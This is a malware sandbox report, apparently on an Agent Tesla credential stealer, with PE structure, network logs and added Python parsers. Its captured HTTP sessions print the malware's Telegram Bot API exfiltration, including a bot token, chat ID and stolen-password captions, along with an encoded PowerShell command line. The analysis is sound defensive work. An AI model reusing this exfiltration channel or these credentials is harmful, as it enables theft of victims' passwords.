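    struct.pack_into("<I", img, 0x3C, 0x40)            # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, 0x44,            # COFF header
                     0x14C, 1, 0x6417E07C, 0, 0, 0xE0, 0x010E)
    opt = 0x58
    struct.pack_into("<H", img, opt, 0x10B)            # PE32 magic
    struct.pack_into("<I", img, opt + 16, 0x2080)      # AddressOfEntryPoint
    struct.pack_into("<I", img, opt + 28, 0x400000)    # ImageBase
    struct.pack_into("<H", img, opt + 70, 0x8560)      # DllCharacteristics
    struct.pack_into("<8sIIII", img, opt + 0xE0,       # one section header
                     b".text\0\0\0", 0x200, 0x2000, 0x200, 0x200)
    img[0x280:0x286] = b"\xff\x25\x00\x20\x40\x00"     # jmp dword ptr [0x402000]
    return bytes(img)


if __name__ == "__main__":
    for key, value in parse_pe(build_sample_image()).items():
        print(f"{key}: {value}")
```

The decoded stub, jmp dword ptr [0x00402000], is the same shape as the disassembly listed for the sample: with the image base at 0x400000, 0x402000 is RVA 0x2000, where a managed executable typically keeps the single import-address-table slot for mscoree!_CorExeMain, and the zero bytes that follow the stub decode as add byte ptr [eax], al. Note that HIGH_ENTROPY_VA only affects 64-bit address-space randomisation and has no effect on a 32-bit image, so its presence here carries no signal.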
                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al (x79: 00 00 padding bytes following the stub all decode to this instruction)
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1c6698 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1c8000 | 0x21e8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1cc000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x1c46f8 | 0x1c4800 | False | 0.4735319190262431 | data | 5.272126053067271 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x1c8000 | 0x21e8 | 0x2200 | False | 0.8832720588235294 | data | 7.595705097596992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1cc000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x1c8130 | 0x1c12 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_GROUP_ICON | 0x1c9d44 | 0x14 | data | |
RT_VERSION | 0x1c9d58 | 0x2dc | data | |
RT_MANIFEST | 0x1ca034 | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators | |
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/20/23-18:33:24.869717 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49715 | 443 | 192.168.2.3 | 149.154.167.220
03/20/23-18:31:36.462231 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49701 | 443 | 192.168.2.3 | 149.154.167.220
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 20, 2023 18:31:27.614362001 CET | 192.168.2.3 | 8.8.8.8 | 0x19fc | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:31:27.642391920 CET | 192.168.2.3 | 8.8.8.8 | 0xa091 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:31:36.269547939 CET | 192.168.2.3 | 8.8.8.8 | 0x71bc | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:35.568073988 CET | 192.168.2.3 | 8.8.8.8 | 0x38bc | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:35.607027054 CET | 192.168.2.3 | 8.8.8.8 | 0xc297 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:23.202795029 CET | 192.168.2.3 | 8.8.8.8 | 0x7ad3 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:23.229949951 CET | 192.168.2.3 | 8.8.8.8 | 0xf168 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:24.733335972 CET | 192.168.2.3 | 8.8.8.8 | 0x2cfe | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 20, 2023 18:31:27.633577108 CET | 8.8.8.8 | 192.168.2.3 | 0x19fc | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:31:27.633577108 CET | 8.8.8.8 | 192.168.2.3 | 0x19fc | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:31:27.633577108 CET | 8.8.8.8 | 192.168.2.3 | 0x19fc | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:31:27.633577108 CET | 8.8.8.8 | 192.168.2.3 | 0x19fc | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:31:27.665841103 CET | 8.8.8.8 | 192.168.2.3 | 0xa091 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:31:27.665841103 CET | 8.8.8.8 | 192.168.2.3 | 0xa091 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:31:27.665841103 CET | 8.8.8.8 | 192.168.2.3 | 0xa091 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:31:27.665841103 CET | 8.8.8.8 | 192.168.2.3 | 0xa091 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:31:36.289082050 CET | 8.8.8.8 | 192.168.2.3 | 0x71bc | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:35.586179972 CET | 8.8.8.8 | 192.168.2.3 | 0x38bc | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:32:35.586179972 CET | 8.8.8.8 | 192.168.2.3 | 0x38bc | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:35.586179972 CET | 8.8.8.8 | 192.168.2.3 | 0x38bc | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:35.586179972 CET | 8.8.8.8 | 192.168.2.3 | 0x38bc | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:35.627496004 CET | 8.8.8.8 | 192.168.2.3 | 0xc297 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:32:35.627496004 CET | 8.8.8.8 | 192.168.2.3 | 0xc297 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:35.627496004 CET | 8.8.8.8 | 192.168.2.3 | 0xc297 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:35.627496004 CET | 8.8.8.8 | 192.168.2.3 | 0xc297 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:23.222448111 CET | 8.8.8.8 | 192.168.2.3 | 0x7ad3 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:33:23.222448111 CET | 8.8.8.8 | 192.168.2.3 | 0x7ad3 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:23.222448111 CET | 8.8.8.8 | 192.168.2.3 | 0x7ad3 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:23.222448111 CET | 8.8.8.8 | 192.168.2.3 | 0x7ad3 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:23.249663115 CET | 8.8.8.8 | 192.168.2.3 | 0xf168 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:33:23.249663115 CET | 8.8.8.8 | 192.168.2.3 | 0xf168 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:23.249663115 CET | 8.8.8.8 | 192.168.2.3 | 0xf168 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:23.249663115 CET | 8.8.8.8 | 192.168.2.3 | 0xf168 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:24.752517939 CET | 8.8.8.8 | 192.168.2.3 | 0x2cfe | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                • api.ipify.org
                                                                                • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49699 | 173.231.16.76 | 443 | C:\Users\user\Desktop\izwFjkhFJm.exe

Timestamp | kBytes transferred | Direction | Data
2023-03-20 17:31:28 UTC | 0 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2023-03-20 17:31:28 UTC | 0 | IN | HTTP/1.1 200 OK
    Content-Length: 14
    Content-Type: text/plain
    Date: Mon, 20 Mar 2023 17:31:28 GMT
    Vary: Origin
    Connection: close
2023-03-20 17:31:28 UTC | 0 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
    Data Ascii: 102.129.143.78


Session ID: 1 | Source IP: 192.168.2.3 | Source Port: 49701 | Destination IP: 149.154.167.220 | Destination Port: 443 | Process: C:\Users\user\Desktop\izwFjkhFJm.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-20 17:31:36 UTC | 0 | OUT | POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8db29c7c3cbde5f
    Host: api.telegram.org
    Content-Length: 972
    Expect: 100-continue
    Connection: Keep-Alive
2023-03-20 17:31:36 UTC | 0 | IN | HTTP/1.1 100 Continue
2023-03-20 17:31:36 UTC | 0 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 63 37 63 33 63 62 64 65 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 31 36 39 33 36 34 37 30 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 63 37 63 33 63 62 64 65 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 31 2f 32 30 32 33 20 30 34 3a 33 30 3a 32 31 0a 55 73 65 72
    Data Ascii: -----------------------------8db29c7c3cbde5fContent-Disposition: form-data; name="chat_id"6169364705-----------------------------8db29c7c3cbde5fContent-Disposition: form-data; name="caption"New PW Recovered!Time: 03/21/2023 04:30:21User
2023-03-20 17:31:36 UTC | 1 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Mon, 20 Mar 2023 17:31:36 GMT
    Content-Type: application/json
    Content-Length: 727
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":true,"result":{"message_id":280,"from":{"id":5687731944,"is_bot":true,"first_name":"Lightshine","username":"Lightshine_bot"},"chat":{"id":6169364705,"first_name":"99","last_name":"Grams","type":"private"},"date":1679333496,"document":{"file_name":"user-494126 2023-03-21 04-30-21.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBGGQYmHhSzFVPJoEN7Pq9q7HeKDV5AAImDwACJVnIUKPKGyrDEZXULwQ","file_unique_id":"AgADJg8AAiVZyFA","file_size":349},"caption":"New PW Recovered!\n\nTime: 03/21/2023 04:30:21\nUser Name: user/494126\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78","caption_entities":[{"offset":178,"length":14,"type":"url"}]}}


Session ID: 2 | Source IP: 192.168.2.3 | Source Port: 49702 | Destination IP: 173.231.16.76 | Destination Port: 443 | Process: C:\Users\user\Desktop\izwFjkhFJm.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-20 17:32:36 UTC | 2 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2023-03-20 17:32:37 UTC | 2 | IN | HTTP/1.1 200 OK
    Content-Length: 14
    Content-Type: text/plain
    Date: Mon, 20 Mar 2023 17:32:37 GMT
    Vary: Origin
    Connection: close
2023-03-20 17:32:37 UTC | 2 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
    Data Ascii: 102.129.143.78


Session ID: 3 | Source IP: 192.168.2.3 | Source Port: 49714 | Destination IP: 173.231.16.76 | Destination Port: 443 | Process: C:\Users\user\Desktop\izwFjkhFJm.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-20 17:33:23 UTC | 2 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2023-03-20 17:33:24 UTC | 3 | IN | HTTP/1.1 200 OK
    Content-Length: 14
    Content-Type: text/plain
    Date: Mon, 20 Mar 2023 17:33:24 GMT
    Vary: Origin
    Connection: close
2023-03-20 17:33:24 UTC | 3 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
    Data Ascii: 102.129.143.78


Session ID: 4 | Source IP: 192.168.2.3 | Source Port: 49715 | Destination IP: 149.154.167.220 | Destination Port: 443 | Process: C:\Users\user\Desktop\izwFjkhFJm.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-20 17:33:24 UTC | 3 | OUT | POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8db297197376642
    Host: api.telegram.org
    Content-Length: 972
    Expect: 100-continue
    Connection: Keep-Alive
2023-03-20 17:33:24 UTC | 3 | IN | HTTP/1.1 100 Continue
2023-03-20 17:33:24 UTC | 3 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 37 31 39 37 33 37 36 36 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 31 36 39 33 36 34 37 30 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 37 31 39 37 33 37 36 36 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 30 2f 32 30 32 33 20 31 38 3a 33 33 3a 32 34 0a 55 73 65 72
    Data Ascii: -----------------------------8db297197376642Content-Disposition: form-data; name="chat_id"6169364705-----------------------------8db297197376642Content-Disposition: form-data; name="caption"New PW Recovered!Time: 03/20/2023 18:33:24User
2023-03-20 17:33:24 UTC | 4 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Mon, 20 Mar 2023 17:33:24 GMT
    Content-Type: application/json
    Content-Length: 727
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":true,"result":{"message_id":282,"from":{"id":5687731944,"is_bot":true,"first_name":"Lightshine","username":"Lightshine_bot"},"chat":{"id":6169364705,"first_name":"99","last_name":"Grams","type":"private"},"date":1679333604,"document":{"file_name":"user-494126 2023-03-20 18-33-24.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBGmQYmORISPAYzBYw3QRGJkcrVYRgAAIqDwACJVnIUOHVmeKO6YghLwQ","file_unique_id":"AgADKg8AAiVZyFA","file_size":349},"caption":"New PW Recovered!\n\nTime: 03/20/2023 18:33:24\nUser Name: user/494126\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78","caption_entities":[{"offset":178,"length":14,"type":"url"}]}}
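
Sessions 1 and 4 are the actual exfiltration: a multipart POST to the Telegram Bot API whose URL path carries the bot token (the credential that controls the bot), whose form fields carry the receiving chat_id and a caption fingerprinting the victim, and whose JSON reply echoes the delivered file name and the full caption. The following script is an added example for this report, not code from the page or from the malware; it parses exactly the request line, Content-Type, raw multipart body and JSON reply shown for session 1 (the body is cut off where the report truncates it, so the parser has to tolerate a missing closing delimiter) and returns the fields an analyst wants as IOCs.

```python
"""Parse the Telegram Bot API exfiltration captured in sessions 1 and 4.

Added example for this report, not code from the page or from the malware.
Inputs are copied from session 1 above; the multipart body stops where the
report truncates it, so the parser must tolerate a missing closing delimiter.
"""
import json
import re

# Request line and Content-Type header of session 1. The page shows the boundary as
# 27 dashes plus a hex suffix; it is built with "-" * 27 here to avoid miscounting.
REQUEST_LINE = "POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1"
CONTENT_TYPE = "multipart/form-data; boundary=" + "-" * 27 + "8db29c7c3cbde5f"

# "Data Raw" of the outgoing multipart body of session 1, segment by segment.
_DASHES = " ".join(["2d"] * 29)                                  # "--" + 27-dash prefix
_BOUNDARY_HEX = "38 64 62 32 39 63 37 63 33 63 62 64 65 35 66"  # 8db29c7c3cbde5f
_DISPOSITION = ("43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 "
                "66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22")  # Content-Disposition: form-data; name="
BODY_HEX = " ".join([
    "0d 0a", _DASHES, _BOUNDARY_HEX, "0d 0a",
    _DISPOSITION, "63 68 61 74 5f 69 64 22", "0d 0a 0d 0a",       # chat_id"
    "36 31 36 39 33 36 34 37 30 35", "0d 0a",                     # 6169364705
    _DASHES, _BOUNDARY_HEX, "0d 0a",
    _DISPOSITION, "63 61 70 74 69 6f 6e 22", "0d 0a 0d 0a",       # caption"
    # New PW Recovered!\n\nTime: 03/21/2023 04:30:21\nUser   (report truncates here)
    "4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 "
    "30 33 2f 32 31 2f 32 30 32 33 20 30 34 3a 33 30 3a 32 31 0a 55 73 65 72",
])

# JSON body of the 200 OK in session 1 (raw string so the \n escapes stay JSON escapes).
RESPONSE_JSON = (
    r'{"ok":true,"result":{"message_id":280,"from":{"id":5687731944,"is_bot":true,'
    r'"first_name":"Lightshine","username":"Lightshine_bot"},"chat":{"id":6169364705,'
    r'"first_name":"99","last_name":"Grams","type":"private"},"date":1679333496,'
    r'"document":{"file_name":"user-494126 2023-03-21 04-30-21.html","mime_type":"text/html",'
    r'"file_id":"BQACAgQAAxkDAAIBGGQYmHhSzFVPJoEN7Pq9q7HeKDV5AAImDwACJVnIUKPKGyrDEZXULwQ",'
    r'"file_unique_id":"AgADJg8AAiVZyFA","file_size":349},"caption":"New PW Recovered!\n\n'
    r'Time: 03/21/2023 04:30:21\nUser Name: user/494126\nOSFullName: Microsoft Windows 10 Pro\n'
    r'CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78",'
    r'"caption_entities":[{"offset":178,"length":14,"type":"url"}]}}'
)

_BOT_URL = re.compile(
    r"^(?P<verb>[A-Z]+) /bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]+)/(?P<api>\w+) HTTP/1\.\d$")


def parse_request_line(line: str) -> dict:
    """Split 'POST /bot<id>:<token>/<method> HTTP/1.1'; the token is the bot credential."""
    m = _BOT_URL.match(line.strip())
    if not m:
        raise ValueError("not a Telegram Bot API request line")
    return m.groupdict()


def multipart_boundary(content_type: str) -> bytes:
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    return m.group(1).encode()


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Return {field name: raw value} for each form-data part. A final part with no
    closing delimiter (the truncated capture on this page) keeps whatever is there."""
    fields = {}
    for part in body.split(b"--" + boundary)[1:]:
        if part.startswith(b"--"):          # "--boundary--" closes the body
            break
        head, sep, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', head)
        if not sep or not name:
            continue
        if value.endswith(b"\r\n"):          # CRLF that precedes the next delimiter
            value = value[:-2]
        fields[name.group(1).decode()] = value
    return fields


def exfil_summary(request_line: str, content_type: str, body_hex: str) -> dict:
    req = parse_request_line(request_line)
    fields = parse_multipart(bytes.fromhex(body_hex), multipart_boundary(content_type))
    return {"bot_id": req["bot_id"], "bot_token": req["token"], "api_method": req["api"],
            "chat_id": fields.get("chat_id", b"").decode("utf-8", "replace"),
            "caption": fields.get("caption", b"").decode("utf-8", "replace")}


def parse_response(text: str) -> dict:
    """The 200 OK echoes the receiving chat, the uploaded file name and the full
    caption; the 'Key: Value' caption lines are the victim fingerprint."""
    r = json.loads(text)["result"]
    victim = {}
    for line in r.get("caption", "").splitlines():
        key, sep, val = line.partition(": ")
        if sep:
            victim[key] = val
    return {"bot_username": r["from"]["username"], "chat_id": r["chat"]["id"],
            "file_name": r["document"]["file_name"], "file_size": r["document"]["file_size"],
            "victim": victim}


if __name__ == "__main__":
    print(json.dumps(exfil_summary(REQUEST_LINE, CONTENT_TYPE, BODY_HEX), indent=2))
    print(json.dumps(parse_response(RESPONSE_JSON), indent=2))
```

The chat_id in the request body (6169364705) matches `chat.id` in the reply, and the bot id in the URL path matches `from.id`, so the reply alone is enough to pivot from a proxy log to the receiving account; the Content-Length of 972 with a 349-byte document confirms the stolen data travels as the attached HTML file, not in the caption.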


                                                                                Target ID:0
                                                                                Start time:18:30:47
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Imagebase:0x3d0000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                Target ID:1
                                                                                Start time:18:30:57
                                                                                Start date:20/03/2023
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                Imagebase:0x1350000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Reputation:high
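
Targets 1 and 19 run powershell.exe with -ENC, which is the -EncodedCommand switch (powershell.exe also accepts -e and -ec, and matches the switch case-insensitively); the argument is Base64 of the script text encoded as UTF-16LE. Decoding the argument on this page gives start-sleep -seconds 20, a plain 20-second pause. The script below is an added example for this report, not code from the page or from the malware: it finds the encoded-command switch in a captured command line without mangling Windows paths, decodes it, and offers the inverse so a detection test can build its own fixtures.

```python
"""Decode the '-ENC ...' PowerShell command line of targets 1 and 19.

Added example for this report, not code from the page or from the malware.
powershell.exe takes -EncodedCommand (also -e / -ec; any longer prefix such
as -enc works too, case-insensitively) as Base64 of the UTF-16LE script text.
"""
import base64
import re

# Command line exactly as the report shows it for targets 1 and 19.
TARGET_1_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC '
    "cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA=="
)

# Split on whitespace but keep quoted paths whole; shlex would eat the backslashes.
_TOKEN = re.compile(r'"[^"]*"|\S+')


def decode_encoded_command(b64: str) -> str:
    """Base64 -> UTF-16LE text, tolerating stripped padding and surrounding quotes."""
    b64 = b64.strip('"')
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le")


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command: what an operator runs to build the argument."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_cmdline(cmdline: str):
    """Return the decoded script if the command line carries an encoded command,
    otherwise None. Switches may be introduced with '-' or '/'."""
    tokens = _TOKEN.findall(cmdline)
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in "-/":
            continue
        switch = tok[1:].lower()
        # -e, -ec, -enc, -encodedcommand: any prefix of the full switch name selects it;
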